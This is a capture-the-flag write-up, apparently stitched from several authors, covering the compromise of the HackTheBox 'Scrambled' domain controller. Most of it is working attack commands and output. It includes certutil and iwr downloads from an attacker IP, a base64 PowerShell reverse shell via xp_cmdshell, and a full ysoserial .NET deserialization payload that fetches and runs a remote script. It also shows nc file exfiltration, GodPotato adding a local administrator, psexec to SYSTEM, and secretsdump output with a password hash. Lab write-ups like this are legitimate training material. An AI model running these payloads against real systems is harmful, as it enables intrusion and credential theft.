Upload SharpHound.exe, I used this version: /usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.exe, and run SharpHound and transfer back to kali for analysis

> certutil.exe -urlcache -f http://10.10.16.3/sh.exe sh.exe

From BloodHound analysis, we can find there is a tstar user from IT group, which has CanPSRemote right. However, this has proven to be useless after some trial and error.

PE

Upload winpeas

> certutil.exe -urlcache -f http://10.10.16.3/p.exe p.exe

# found something intersting from WinPeas
ScrmOrders(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Auto - Running - No quotes and Space detected

[+] Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
HR (Path: C:\Shares\HR) -- Permissions: AllAccess
IPC$ (Path: )
IT (Path: C:\Shares\IT) -- Permissions: AllAccess
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\scrm.local\SCRIPTS)
Public (Path: C:\Shares\Public) -- Permissions: AllAccess
Sales (Path: C:\Shares\Sales) -- Permissions: AllAccess
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)

There is a pdf document in C:\Shares\Public, it says HR has a database, which may contain user passwords

Check db for user passwords

> sqlcmd -q "select name from sys.databases"

Check tables in ScrambleHR

> sqlcmd -q "use ScrambleHR;select table_name from information_schema.tables"

# found
Employees
UserImport
Timesheets

Check table content of UserImport, found user MiscSvc with ldap credential

> sqlcmd -q "use ScrambleHR;select db_name();select * from UserImport;"

MiscSvc is an IT User, which mean, it has CanPSRemote permission, but evil-winrm doesn’t work.

in order to get a reverse shell, you can use the “PowerShell #3 (Base64)” from revshells.com.

SQL> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAG[...]


kali@kali:~/Documents/HTB/Scrambled$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.11.168] 57867
whoami
scrm\sqlsvc
PS C:\Windows\system32>

Now, we need to create another reverse shell in order to become MiscSvc, obtaining the user flag.

For doing so, execute the following commands:

$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)
Invoke-Command -Computer dc1 -Credential $Cred -ScriptBlock {<SAME PAYLOAD AS BEFORE>}

Privilege Escalation

From previous enum, there is a server app running at C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe

Check the user that’s running the process received NA, the process might be run by an account with a higher privilege.

> tasklist /v

However we can access c:\shares\it, there is a copy of the Sale Order Client application and a dll file.

* Copy these two files to c:\temp
> nc.exe 10.10.16.3 7777 < ScrambleLib.dll
> nc.exe 10.10.16.3 7777 < ScrambleClient.exe
* On kali
> nc -vnlp 7777 > ScrambleLib.dll
> nc -vnlp 7777 > ScrambleClient.exe

Reverse Eng

We can find some seemingly operation codes from strings

> strings ScrambleLib.dll

Setup ilspy and reverse the dll, https://github.com/icsharpcode/ILSpy

> /root/.dotnet/tools/ilspycmd -p -o decompile ScrambleLib.dll

Read the decompiled code and understand how the commands work. The payloads are .net serialised.

Use ysoserial to exploit .net deserilisation vulnerabilities, this needs to run on windows, https://github.com/pwntester/ysoserial.net

> ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') }"

Run a nc listener and upload the payload

> nc 10.10.16.3 4411
> UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA8ApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBdGdZOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0T0NJL1BnMEtQRTlpYW1WamRFUmhkR0ZRY205MmFXUmxjaUJOWlhSb2IyUk9ZVzFsUFNKVGRHRnlkQ0lnU1hOSmJtbDBhV0ZzVEc5aFpFVnVZV0pzWldROUlrWmhiSE5sSWlCNGJXeHVjejBpYUhSMGNEb3ZMM05qYUdWdFlYTXViV2xqY205emIyWjBMbU52YlM5M2FXNW1lQzh5TURBMkwzaGhiV3d2Y0hKbGMyVnVkR0YwYVc5dUlpQjRiV3h1Y3pwelpEMGlZMnh5TFc1aGJXVnpjR0ZqWlRwVGVYTjBaVzB1UkdsaFoyNXZjM1JwWTNNN1lYTnpaVzFpYkhrOVUzbHpkR1Z0SWlCNGJXeHVjenA0UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkNJK0RRb2dJRHhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWEl1VDJKcVpXTjBTVzV6ZEdGdVkyVStEUW9nSUNBZ1BITmtPbEJ5YjJObGMzTStEUW9nSUNBZ0lDQThjMlE2VUhKdlkyVnpjeTVUZEdGeWRFbHVabTgrRFFvZ0lDQWdJQ0FnSUR4elpEcFFjbTlqWlhOelUzUmhjblJKYm1adklFRnlaM1Z0Wlc1MGN6MGlMMk1nY0c5M1pYSnphR1ZzYkM1bGVHVWdTVzUyYjJ0bExVTnZiVzFoYm1RZ0xVTnZiWEIxZEdWeUlHUmpNU0F0VTJOeWFYQjBRbXh2WTJzZ2V5QkpSVmdvVG1WM0xVOWlhbVZqZENCT1pYUXVWMlZpUTJ4cFpXNTBLUzVrYjNkdWJHOWhaRk4wY21sdVp5Z25hSFIwY0Rvdkx6RXdMakV3TGpFMkxqTXZjMmhsYkd3dWNITXhKeWtnZlNJZ1UzUmhibVJoY21SRmNuSnZja1Z1WTI5a2FXNW5QU0o3ZURwT2RXeHNmU0lnVTNSaGJtUmhjbVJQZFhSd2RYUkZibU52WkdsdVp6MGllM2c2VG5Wc2JIMGlJRlZ6WlhKT1lXMWxQU0lpSUZCaGMzTjNiM0prUFNKN2VEcE9kV3hzZlNJZ1JHOXRZV2x1UFNJaUlFeHZZV1JWYzJWeVVISnZabWxzWlQwaVJtRnNjMlVpSUVacGJHVk9ZVzFsUFNKamJXUWlJQzgrRFFvZ0lDQWdJQ0E4TDNOa09sQnliMk5sYzNNdVUzUmhjblJKYm1adlBnMEtJQ0FnSUR3dmMyUTZVSEp2WTJWemN6NE5DaUFnUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJdVQySnFaV04wU1c1emRHRnVZMlUrRFFvOEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL

Get the reverse shell and catch the root flag

rooted

Alternative Roots

Unintended File Read Via MSSQL

Wh04m1 got root blood on Scrambled using this technique. This post on MSSQL Tips talks about how to read a file using MSSQL using the BULK option, which was added to SQL Server 2005. Their example query is:

SELECT BulkColumn 
FROM OPENROWSET (BULK 'c:\temp\mytxtfile.txt', SINGLE_CLOB) MyFile 

OPENROWSET returns a single column named BulkColumn. MyFile is a correlation name, which isn’t really important here other than it must exist, and it doesn’t really matter what I put there.

OPENROWSET, when used with the BULK provider takes a file path and one of three keywords:

  • SINGLE_BLOB returns as a varbinary
  • SINGLE_CLOB returns as a varchar
  • SINGLE_NCLOB returns as a nvarchar

So to read root.txt, I’ll run:

SQL> SELECT BulkColumn FROM OPENROWSET(BULK 'C:\users\administrator\desktop\root.txt', SINGLE_CLOB) MyFile
BulkColumn

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   

b'a01b823bd0d7c97c98646d36d1d03c02\r\n' 

GodPotato

Unintended way

Get Execution Via MSSQL

To get to a place where I could run RoguePotato, I’ll need to be executing with the SeImpersonatePrivilege. I’m most likely to find this through the MSSQL service.

To run commands via MSSQL, I’ll use the xp_cmdshell stored procedure.

Rogue&JuicyPotato will work on Scrambled, but I’ll use this opportunity to show GODPOTATO.

PS C:\programdata> whoami
whoami
scrm\miscsvc
PS C:\programdata> iwr 10.10.14.2:8000/rcat_10.10.14.2_9001.exe -outfile rcat_10.10.14.2_9001.exe
iwr 10.10.14.2:8000/rcat_10.10.14.2_9001.exe -outfile rcat_10.10.14.2_9001.exe

.

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ impacket-mssqlclient -k dc1.scrm.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SCRM\administrator  dbo@master)> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser   LdapPwd             LdapDomain   RefreshInterval   IncludeGroups   
--------   -----------------   ----------   ---------------   -------------   
MiscSvc    ScrambledEggs9900   scrm.local                90               0   

SQL (SCRM\administrator  dbo@master)> whoami /priv
ERROR(DC1): Line 1: Incorrect syntax near '/'.
SQL (SCRM\administrator  dbo@master)> whoami 
ERROR(DC1): Line 1: Could not find stored procedure 'whoami'.
SQL (SCRM\administrator  dbo@master)> xp_cmdshell whoami
ERROR(DC1): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (SCRM\administrator  dbo@master)> EXECUTE sp_configure 'show advanced options', 1
INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> RECONFIGURE
SQL (SCRM\administrator  dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> RECONFIGURE
SQL (SCRM\administrator  dbo@master)> xp_cmdshell whoami
output        
-----------   
scrm\sqlsvc   

NULL          

SQL (SCRM\administrator  dbo@master)> xp_cmdshell C:\\programdata\\rcat_10.10.14.2_9001.exe

.

 rlwrap nc -nlvp 9001   
listening on [any] 9001 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.168] 58416
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Windows\system32> cd c:\programdata
cd c:\programdata
PS C:\programdata>PS C:\programdata> .\god.exe -cmd "net user puck Start123 /add"
PS C:\programdata> .\god.exe -cmd "net localgroup Administrators puck /add"




.

impacket-psexec scrm.local/puck:Start123@dc1.scrm.local -k   
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Requesting shares on dc1.scrm.local.....
[*] Found writable share ADMIN$
[*] Uploading file mwRrJIMc.exe
[*] Opening SVCManager on dc1.scrm.local.....
[*] Creating service BSRw on dc1.scrm.local.....
[*] Starting service BSRw.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 

get same hashes

impacket-secretsdump scrm.local/puck:Start123@dc1.scrm.local -k    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x33d8cbadba9e3f89bd60e5bfe64743e3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ebb16eb3b0b1d0bea029cab7d18e534c:::
...

 

that was fun